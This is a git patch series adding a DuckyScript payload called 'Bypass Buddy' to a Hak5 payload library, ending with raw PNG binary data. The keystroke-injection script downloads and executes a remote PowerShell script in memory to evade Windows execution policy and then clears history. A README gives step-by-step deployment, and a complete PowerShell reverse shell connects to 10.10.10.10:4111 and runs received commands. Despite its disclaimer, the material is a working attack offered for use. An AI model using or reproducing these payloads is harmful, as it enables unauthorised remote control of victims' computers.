From dd72e4b9cc14a6367759cd370eebdfcfb505e45a Mon Sep 17 00:00:00 2001 From: salt-or-ester <133813929+salt-or-ester@users.noreply.github.com> Date: Fri, 13 Sep 2024 12:29:59 -0700 Subject: [PATCH 01/10] Create bypass-buddy.txt In this DuckyScript™, we explore a method to evade Windows 11's Script Execution Policy protections. The approach involves downloading a script to RAM, then executing it in RAM on-the-fly. This can be accomplished **without** administrative rights. --- .../execution/bypass-buddy/bypass-buddy.txt | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 payloads/library/execution/bypass-buddy/bypass-buddy.txt diff --git a/payloads/library/execution/bypass-buddy/bypass-buddy.txt b/payloads/library/execution/bypass-buddy/bypass-buddy.txt new file mode 100644 index 00000000..82f654e3 --- /dev/null +++ b/payloads/library/execution/bypass-buddy/bypass-buddy.txt @@ -0,0 +1,31 @@ +REM_BLOCK + The Bypass Buddy + by salt-or-ester - salt-or-ester@protonmail.com + Tested on: O.MG Plug Elite, Windows 11 + Will likely work on other devices and Windows flavors + + The Bypass Buddy implements a method to evade Windows script execution + policy protections. + + The approach involves downloading a Powershell script into memory (not disk), + and running it on-the-fly. + + This can be accomplished without administrative rights. +END_REM + +REM Payload to download and run in memory +DEFINE #PAYLOAD_URL "http://10.10.10.10/payload.ps1" + +FUNCTION EVADE_SCRIPT_EXECUTION_POLICY() +GUI r +DELAY 2000 REM Let GUI load +STRINGLN powershell +DELAY 1000 REM Let Powershell window open +STRINGLN Start-Job -ScriptBlock { try { $response = Invoke-WebRequest -Uri #PAYLOAD_URL -ErrorAction Stop; $scriptContent = [System.Text.Encoding]::UTF8.GetString($response.Content); cd ~; Invoke-Expression $scriptContent } catch { Write-Error "Failed to download or execute script: $_" } } +STRINGLN Clear-History +STRINGLN clear +GUI DOWNARROW +END_FUNCTION + +DELAY 3000 REM Wait for device to be "ready" +EVADE_SCRIPT_EXECUTION_POLICY() From a8ad722e5c3ffbb034d345f942c901e093ad30cc Mon Sep 17 00:00:00 2001 From: salt-or-ester <133813929+salt-or-ester@users.noreply.github.com> Date: Fri, 13 Sep 2024 12:31:17 -0700 Subject: [PATCH 02/10] Add files via upload In this DuckyScript™, we explore a method to evade Windows 11's Script Execution Policy protections. The approach involves downloading a script to RAM, then executing it in RAM on-the-fly. This can be accomplished **without** administrative rights. --- .../library/execution/bypass-buddy/README.md | 64 +++++++++++++++++++ .../execution/bypass-buddy/reverse-shell.ps1 | 42 ++++++++++++ 2 files changed, 106 insertions(+) create mode 100644 payloads/library/execution/bypass-buddy/README.md create mode 100644 payloads/library/execution/bypass-buddy/reverse-shell.ps1 diff --git a/payloads/library/execution/bypass-buddy/README.md b/payloads/library/execution/bypass-buddy/README.md new file mode 100644 index 00000000..21455ca6 --- /dev/null +++ b/payloads/library/execution/bypass-buddy/README.md @@ -0,0 +1,64 @@ +# The Bypass Buddy: Bypass Script Execution Policies + +Running user (target) does **not** need to have admin rights. Bypass Buddy has only been tested on the [O.MG Plug Elite](https://hak5.org/products/omg-plug), Windows 11. It likely works on other [hak5 devices](https://hak5.org/products/) and Windows distributions -- the payload is written in standard DuckyScript™. + +## Overview + +### Target Has a Strict "Script Execution Policy"? Evade it and Run Whatever Script You Please! + +In this DuckyScript™, we explore a method to evade Windows 11's Script Execution Policy protections. The approach involves downloading a script to RAM, then executing it in RAM on-the-fly. This can be accomplished **without** administrative rights. + +
+ +
+ +## How It Works + +To avoid Windows Script Execution policies: +1. **Upload** your .ps1 script to any webserver. +2. **Download** the Powershel script to memory on the target host. +3. **Execute** the Powershell script in RAM dynamically on your target host. +*Note: Nothing is ever written to disk.* + +## Steps to Execute a Restricted Powershell Payload + +1. **Prepare Your Powershell Script (.ps1)** + - Create your Powershell script. The example `reverse-shell.ps1` creates a reverse shell on the target host. You can create any Powerscript payload you please. + +2. **Upload Your Powershell Payload** + - Upload your .ps1 script to the serving-directory of your (attacking) webserver. + +3. **Set Up Your Listener** + - Open a listener on your receiving (attacking) host using Netcat or any listener you please: + ```bash + nc -v -p 4111 + ``` + +4. **Prepare Your DuckyScript™ Payload** + - Add `bypass-buddy.txt` to the 'boot' slot of your O.MG Plug. + +5. **Deploy the O.MG Plug** + - Implant your O.MG Plug into the target host. + +6. **Wait for Connection** + - Wait for the target host to connect to your listener. + +7. **Verify the Connection** + - Type `whoami` into the reverse shell and hit enter. + +8. **Success!** + - You did it! + ++ +
+ +## Notes + +- **Ensure** to modify both `reverse-shell.ps1` and `bypass-buddy.txt` with your specific configurations, including the IP address and port of your sending/receiving hosts, if you choose to use `reverse-shell.ps1` as your payload. +- In cases where you'd like to create your own .ps1 payload, modify just `bypass-buddy.txt` with your webserver's host/IP and script name. +- This method is a **proof-of-concept** and should be tested responsibly and legally. + +--- + +*Remember, the purpose of this proof-of-concept is educational and for understanding how RAM injection/execution can be used to bypass certain security measures. Always use these techniques ethically and within the bounds of the law.* diff --git a/payloads/library/execution/bypass-buddy/reverse-shell.ps1 b/payloads/library/execution/bypass-buddy/reverse-shell.ps1 new file mode 100644 index 00000000..836dafb8 --- /dev/null +++ b/payloads/library/execution/bypass-buddy/reverse-shell.ps1 @@ -0,0 +1,42 @@ +# Create a TCP client and connect to the specified address and port +$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10', 4111) +$stream = $client.GetStream() +$writer = New-Object System.IO.StreamWriter($stream) +$reader = New-Object System.IO.StreamReader($stream) +$writer.AutoFlush = $true + +# Continuously listen for commands and execute them +while ($true) { + try { + # Read command from the listener + $command = $reader.ReadLine() + + # Check if the command is null or empty and continue to next iteration + if ([string]::IsNullOrWhiteSpace($command)) { + continue + } + + # Execute the command and capture the output + $output = Invoke-Expression $command 2>&1 | Out-String + + # Send the output back to the listener + $writer.WriteLine($output) + } + catch { + # Handle any errors that occur during command execution + $errorMessage = $_.Exception.Message + $writer.WriteLine("Error: $errorMessage") + } + finally { + # Check if the stream is still open, if not, re-establish the connection + if (-not $client.Connected) { + $client.Close() + Start-Sleep -Seconds 5 # Sleep before trying to reconnect + $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10', 4111) + $stream = $client.GetStream() + $writer = New-Object System.IO.StreamWriter($stream) + $reader = New-Object System.IO.StreamReader($stream) + $writer.AutoFlush = $true + } + } +} \ No newline at end of file From f5ae0446db3239798d22b64cf3bc4aff643b945d Mon Sep 17 00:00:00 2001 From: salt-or-ester <133813929+salt-or-ester@users.noreply.github.com> Date: Fri, 13 Sep 2024 12:32:16 -0700 Subject: [PATCH 03/10] Create tmp --- payloads/library/execution/bypass-buddy/img/tmp | 1 + 1 file changed, 1 insertion(+) create mode 100644 payloads/library/execution/bypass-buddy/img/tmp diff --git a/payloads/library/execution/bypass-buddy/img/tmp b/payloads/library/execution/bypass-buddy/img/tmp new file mode 100644 index 00000000..3f3ae824 --- /dev/null +++ b/payloads/library/execution/bypass-buddy/img/tmp @@ -0,0 +1 @@ +In this DuckyScript™, we explore a method to evade Windows 11's Script Execution Policy protections. The approach involves downloading a script to RAM, then executing it in RAM on-the-fly. This can be accomplished **without** administrative rights. From 7428e9201009d9d4c5004638fdeb63f446b2bdd9 Mon Sep 17 00:00:00 2001 From: salt-or-ester <133813929+salt-or-ester@users.noreply.github.com> Date: Fri, 13 Sep 2024 12:32:53 -0700 Subject: [PATCH 04/10] Add files via upload --- .../library/execution/bypass-buddy/img/art.txt | 9 +++++++++ .../execution/bypass-buddy/img/evasion.png | Bin 0 -> 24553 bytes .../bypass-buddy/img/reverse-shell.png | Bin 0 -> 173467 bytes .../execution/bypass-buddy/img/the-eye.png | Bin 0 -> 129826 bytes 4 files changed, 9 insertions(+) create mode 100644 payloads/library/execution/bypass-buddy/img/art.txt create mode 100644 payloads/library/execution/bypass-buddy/img/evasion.png create mode 100644 payloads/library/execution/bypass-buddy/img/reverse-shell.png create mode 100644 payloads/library/execution/bypass-buddy/img/the-eye.png diff --git a/payloads/library/execution/bypass-buddy/img/art.txt b/payloads/library/execution/bypass-buddy/img/art.txt new file mode 100644 index 00000000..35a839d9 --- /dev/null +++ b/payloads/library/execution/bypass-buddy/img/art.txt @@ -0,0 +1,9 @@ +▀█████████▄ ▄██ ▄ ▄███████▄ ▄████████ ▄████████ ▄████████ ▀█████████▄ ███ █▄ ████████▄ ████████▄ ▄██ ▄ + ███ ███ ███ ██▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▀███ ███ ▀███ ███ ██▄ + ███ ███ ███▄▄▄███ ███ ███ ███ ███ ███ █▀ ███ █▀ ███ ███ ███ ███ ███ ███ ███ ███ ███▄▄▄███ + ▄███▄▄▄██▀ ▀▀▀▀▀▀███ ███ ███ ███ ███ ███ ███ ▄███▄▄▄██▀ ███ ███ ███ ███ ███ ███ ▀▀▀▀▀▀███ +▀▀███▀▀▀██▄ ▄██ ███ ▀█████████▀ ▀███████████ ▀███████████ ▀███████████ ▀▀███▀▀▀██▄ ███ ███ ███ ███ ███ ███ ▄██ ███ + ███ ██▄ ███ ███ ███ ███ ███ ███ ███ ███ ██▄ ███ ███ ███ ███ ███ ███ ███ ███ + ███ ███ ███ ███ ███ ███ ███ ▄█ ███ ▄█ ███ ███ ███ ███ ███ ███ ▄███ ███ ▄███ ███ ███ +▄█████████▀ ▀█████▀ ▄████▀ ███ █▀ ▄████████▀ ▄████████▀ ▄█████████▀ ████████▀ ████████▀ ████████▀ ▀█████▀ + \ No newline at end of file diff --git a/payloads/library/execution/bypass-buddy/img/evasion.png b/payloads/library/execution/bypass-buddy/img/evasion.png new file mode 100644 index 0000000000000000000000000000000000000000..2f84a0ef5c74b0db2cf6fb3c6d8d03f932683ac8 GIT binary patch literal 24553 zcmaHSWmFvN(lrTg0fHu22*HATa0?JzgTpWo+}#;8xWnLLWm@+&zQn!-^-S3Y3eE3Jw5Q61%
zC7%TFha>44bpXL6h$vV`ZB(b5V@fc-Y=D-C=- j>T|HQ-=W&59
zKI$Ykqe#{WIghr$*avBv#H|u9#8a45Jl-^b=2p!niw}eH@!7px5(Df !xOxbDUUc}0#9~cCv@1Mm
zy!~f_6ON(CtF7Pvb1L`9-=&V6qw_t& 5UTy`ADK_7Pn|=1VfM0p2;Gb^&
zWW4vuC|xHqdTK*w_-PN@tnBGnrj+?1U#_>L2^|Mg^N(|9#QQ;Xe4JnOh(SKEfq$~r-k`?hP=SGa&V
z`Rjz6iPddT^Nto+q++d$31oCiSDRf(dEGIXZ=jeO_fu%K0|dU(NKfJKb(t_I6XEjA
zYb)I#w$i-nl_?~%%o4ZNsmPN#4He+X?v%WObcuew`qiZ5Qibx&!t-;qp920i!tnmj
zn|naRBDvt=t%4_7
zMD+Ied{%c}c4$_Tt3hM-OTID&keBoB#uCAFSPBG#0bE7`swV=Ub0
3;@4vXK
z$FXqL>}Ac0{x0OVNS3?v&c8QajkJ|W@*8|-O!5Po-AEiR4AgIqqaQ-LX8AmuSS&A*
zfu`9kOSjiZHORWPbGtlHCA+Qb9lZAi1vKM^`MOvuFj9S%u$i%j>(kmq=)p{PSm}Sv
zcta4<mLOxH**{NpQrP3~uAem&3U
zhWeUPYXn8!u3NIYLwTyF=g`LPrw$XJ%i$I3520Nj6ZY!Tt?_q7_EE*JqJmcfGT{b?
z4JT*ECEsjbkmxZAdGe{T-G`8AYsBli?Y~>i|G0M%`)o{_vxf8vk~yiN>D%PoyY?~J
zq1Vup2JOOvttzL2KLfTgkBQEv8S*_2$`_jXWe&ICiv0!!2zTmjRlQuhggXN5QmL@H
zNJYu>q3L^o_&_BTZdh*z1>}eA_0*8$spZ}|J90U(s!Q+F==;*WO1w-FA_i2*T0+~%
zmz**-#=r&q0iRZhI|be39@lokRkZPbW^1#CI~VPiAAP=MYD+oViSnbey8~$N4-qJ?
z`Dw#+p&{{tX?Z`D?ATAx<{W%T1jRJF4ul!*Z{`N4x=}%5dQO}j-j3UUJ0Hx4*9}{XJ8MUb
z7S{=hQbHA%55Y1e9Vm{^wp&PKS)wXmMp|?SC97}F3*`b@S9Q*w&*XmDGwDg#!o|E~Hf7
zLMY|5CZl}W+IKL2zWg-f{9RXRHO_*WaAhg-Px|VMiqfZ~1Y)Wy
z877^9A6@yjxI$Thdtbi*82Y3?R$7IZdmK(i4XQ+X2X{3UH=VPMLF)1|KKs<%oP}8|
ztXLM<5wRCzPf}n5ouAIkkw02`<7Jto(3R%nt*;}-eFH*v3}eNowT_S}k4_I6O0Rfu
z=tTF(v0(VKxW`lyt~S>o3x2DMm^{O9ldL^}gzcf>Mdx{FZL)}0vPXrgFcIG_T;nD$
zNa3yPK^vM(44AZdfn8zesoAgCRPA!|nd?*1{9rsee9YO4OghLc{SD9+tb26-wtzgq
zFgmm=aC(g8{Qo?|`_uG`N-6Pj-tyfrJ->LJs0D3`CB=8I%U{TN|H|GeW!PG9dlDPp
zAX){tMj?`8@!|(Zsdq(q*i5A5`NxYdB~h1IRe0)g;zwH*X